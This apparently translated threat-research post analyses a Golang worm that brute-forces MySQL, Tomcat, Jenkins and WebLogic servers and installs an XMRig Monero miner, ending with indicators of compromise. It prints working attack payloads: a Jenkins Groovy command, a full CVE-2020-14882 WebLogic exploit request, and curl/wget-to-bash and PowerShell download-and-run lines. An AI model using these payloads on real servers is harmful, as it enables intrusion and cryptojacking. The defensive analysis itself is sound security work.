coin miner

Golang worm turns Windows and Linux servers into Monero mining

Introduction

Using Golang language to develop multi-platform malware is the development trend of malware in 2020. In early December 2020, researchers discovered a new written in Golang. The worm attempts to spread across the network to run XMRig Monero mining machines on a large scale. The malware targets Windows and Linux servers. In the old version, the worm tried to exploit WebLogic’s vulnerability-CVE-2020-14882.

Researchers found that the attackers continue to update the on the C2 server, indicating that malware developers are very active and may attack other weakly configured services in future updates.

Technical analysis

The attacker used 3 files:

· Dropper script (bash or powershell);

· Golang binary worm;

· XMRig mining machine.

These 3 files are all located on the same C2 server.

So far, neither the ELF binary file nor the bash dropper script has been detected in VirusTotal. Figure 1 is the detection result of VirusTotal on ELF worm binary files.

clip_image001

Figure 1: VirusTotal’s detection result of ELF binary file

Malware behaves very similarly on Windows and Linux operating systems. The following analyzes the workflow of the Linux worm.

Linux worm workflow

After the worm is executed, it will check whether there is a process listening on port 52013 on the infected machine. The existence of the port listener is a mutex. If the port’s socket is already open, the malware instance will exit, otherwise it will open a port’s network socket.

In the old version, the worm will decompress the XMRig mining machine to Network01 to the tmp folder and run it. Mining opportunities use the Go resource embedding package (go-bindata) to embed the Golang binary file, and the malware will use the binary file to decompress the embedded XMRig mining machine. Figure 2 is the function in the file:

clip_image002

Figure 2: xmrig_linux_amd64.go file

Malware will use TCP SYN to scan the network to find services that can be brute-forced and spread across the network. Then scan the IPs with open ports related to these services. The port of Tomcat and Jenkins is 8080, the port of MySQL is 3306, and the port of WebLogic is 7001. These exploits have a package under the src exp code.

clip_image003

Figure 3: “exp” package files and functions

The worm uses the gopacket library to provide C bindings for the Go language and libpcap to read network packets. By running pcapc, the worm will collect network data and continue to brute force the service. Figure 4 is the result of worm brute force cracking and attempting to exploit vulnerabilities on Tomcat and MySQL services.

clip_image004

Figure 4: Fragment of worm results

After exploiting the vulnerability, the malware will spread a loader script: ld.sh for Linux systems and ld.ps1 for Windows platforms. The loader is responsible for releasing and running the XMRig mining machine and Golang worm. Figure 5 and Figure 6 are the loader scripts.

clip_image005

Figure 5: ldr.sh-the releaser bash script for Linux platform

clip_image006

Figure 6: ldr.ps1 script-dropper powershell script for Windows platform

Exploit flow

The following describes the attack flow of each service:

MySql: Port 3306

Malware will run credential brute force attacks. The malware uses hard-coded weak credential directories, such as root:123456.

After a successful login, the malware will use the mysql UDF to run the shellcode to obtain local privilege escalation. The exploit is embedded in the binary file in the form of a hexadecimal string. Worms have different exploits for different operating systems and architectures. The designed systems and architectures are UDFLINUX32, UDFLINUX64, UDFLWIN32 and UDFWIN64.

After running the exploit, the payload uses the sys_exec command to release and run the loader script. URLWIN and URLLINUX save the releaser script URL. Figure 7 and Figure 8 are the payloads corresponding to each operating system.

clip_image007

Figure 7: MySQL query-Linux payload

clip_image008

Figure 8: MySQL query-Windows payload

Tomcat: Port 8080

The malware uses basic authentication to run credential filling on the administrator panel.

clip_image009

Figure 9: Example of authentication request to Tomcat admin panel

After a successful attempt, the malware will attempt to deploy a WAR file to transmit the 1.jsp file containing the malicious payload.

The malware will send a Get request and analyze the parameters of the jsp file %s/1.jsp?win=%s&linux=%s. These parameters contain the URL of the dropper script. Then, the JSP script will release and run its loader.

clip_image010

Figure 10: 1.jsp file script

Jenkins: Port 8080

Similar to the previous exploit, the malware will use password padding to brute force the Jenkins login and run the following payload:

[email protected]/[email protected] iex(New-Object Net.WebClient).DownloadString(‘%s’)[email protected]@(curl -fsSL %s || wget -q -O – %s) | bash

println “%s”+”%s”;def s=new String(Base64.getDecoder().decode(“%s”+”%s”.reverse())).split(“!”);def c=System.getProperty(“os.name”).contains(“indo”)?s[0].split(“@”):s[1].split(“@”);c.execute()

WebLogic: Port 7001

In previous versions, the malware used the latest WebLogic remote code execution vulnerability to exploit CVE-2020-14882. The malware will send a get request to the WebLogic service and use the GET request header as part of the payload.

GET

/console/css/%%25%%32%%65%%25%%32%%65%%25%%32%%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(‘ weblogic.work.ExecuteThread

%%20currentThread(weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.

WorkAdapter%%20adapter=currentThread.getCurrentWork();java.lang.reflect.Field%%20

field=adapter.getClass().getDeclaredField(“connectionHandler”);field.setAccessible

(true);Object%%20obj=field.get(adapter);weblogic.servlet.internal.ServletRequestI

mpl%%20req(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod

(“getServletRequest”).invoke(obj);String%%20cmd=req.getHeader(“cmd”);String[]%%

20cmds=System.getProperty(“os.name”).toLowerCase().contains(“win”)?new%%20String[]{“cmd.exe”,”/c”,req.getHeader(“win”)}:new%%20String[]{“/bin/sh”,”c”,req.getHeader

(“linux”)};if(cmd!=null{String%%20result=new%%20java.util.Scanner(new%%20java.lang

.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(“%%5C%%5CA”).next();

weblogic.servlet.internal.ServletResponseImpl%%20res(weblogic.servlet.internal.

ServletResponseImpl)req.getClass().getMethod(“getResponse”).invoke(req);work.

getServletOutputStream().writeStream(new%%20weblogic.xml.util.StringInputStream

(result));work.getServletOutputStream().flush

();}currentThread.interrupt();’) HTTP/1.0

Host: %s:%d

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:82.0) Gecko/20100101 /82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Connection: close

cmd: ls

linux: ( (curl -fsSL %s || wget -q -O – %s) | bash& )

win: start powershell iex(New-Object Net.WebClient).DownloadString(‘%s’)

to sum up

In 2020, researchers have discovered many Golang malware attacking different platforms, including Windows, Linux, Mac and Android. Researchers believe this trend will continue in 2021. In addition, the PE and ELF version codes of the worm are almost identical.

IOCs

185[.]239[.]242[.]71

236d7925cfafc1f643babdb8e48966bf
ead2cf8ab7aef63706b40eb57d668d0a
750644690e51db9f695b542b463164b9
f4c90b41126fc17848bd0d131288bd36
d8499b7b2e2aeb76387668306e982673
301a0a58dd98ecbbe12c6acbd0c7bbdc
f5859e81ff49dd66e501ec7c0f39c83e
9c2aa65235a939b2811f281a45ecdab0
078b2a96f45b493e82b44f8c5344e7e5
d708a5394e9448ab38201264df423c0a
030231d96234f06ae09ca18d621241e5
14f57bd246cc1db3131cab421fbc8dac
642d73c85e6e79720a5ae7b82fc427c5
b1a4ec25e168156aeee8184b05777b1b
97d89d25e9589f995d374cb7d89b4433
569fcf95f3889cefd87c1b425fa37b03
5ff84493d7143b482c422e741a4098f1e5c68149
0630097e2962e26e37600ce16fb78821625de6d0
8ed923a83924680858d6518433adf36988991868
a428261aae2ec2821f21411dee4d8c16a70e66fd
edd743e4ba3fca72494879e571e596584fe37a85
18e9e02294d598a68f94de1333f6b31291b81bcf
cf69d3be6f01ba5d3ec29a9fb50b58b5aaea9aca
88a9656cf712bed892bd41a57b71b695e38b2b1a
175e50785a8ec6ba84894d973f4b321040ccc301
16403ee190cc1799d4400cd5daee0b6b8b0110ac
83609ca595a9a675f0dbbf147e7cb7a9e022d659
3d2a9819c6f2a39ad0b0a3a82c8ad7f8a5ee4883
c0f12971eeff4f7ea5c8deb733a8eb0565e92cfd
f991fcd63b66f28acec406119dd7af2638bf6a35
3ce0ba5a07767b4c1bfded6d6ee80457dd447074
74948333fd5cced7e04dc67e68096b64371602a9
3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5
1a63f7a38c7f5a5cc770246c958aea70ea95bcafac1bad92d2d524f4fe24c1ca
62ba664a95b3ca00e7a71fe6aa4a979c5a50f16a62cf72830af13bec7edb1da4
67f03f3065ec012cd8853e9d1b11cb441741910a24cb23ea652fb63d7219ebaa
18bc08cccf7ba713c7cc734547dca9776fcee9459c0b4e9549bb8b9923d21732
720341984c842070dcc925cb47127aba35e16971cf7d532cc2efb24b98d56c93
7e765c12a391308879f1e6b57bf6ae87c0fd0e8d6e0207954cc3a41fd387fda9
2ca7ac7c1884004ea3ce310e2ed8bc23ecb0e26826aff48e4662809cc4299350
d1e4fb661716aa79351fdb86c6a364a4a52a86d85ecf91afff052abdfc168b5b
934b422f0b8d26bd1c094bd532ddd947a702262c27991d757a9a6e3672014e98
15e0b4302902a425dcd0476a60a0d96a17c5a6cdd9fe13c2d09c5055e48178e4
96a1312edf9d69a6bf54555f7d015e7e580f7b7576d400e581498319ee644063
24a84889f53b65b6738dd0194ff6d15f6ae227e37a91a4589ba51ce1f019a4f8
2ed8a73945ec6e9ed23714016c20db934740e0904eac2b0dc5a0d44b3498f97d
b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09
bac8a452547ae6690c56c2fc5274d55d13e8c063e615f2f964cc8413ba5c640c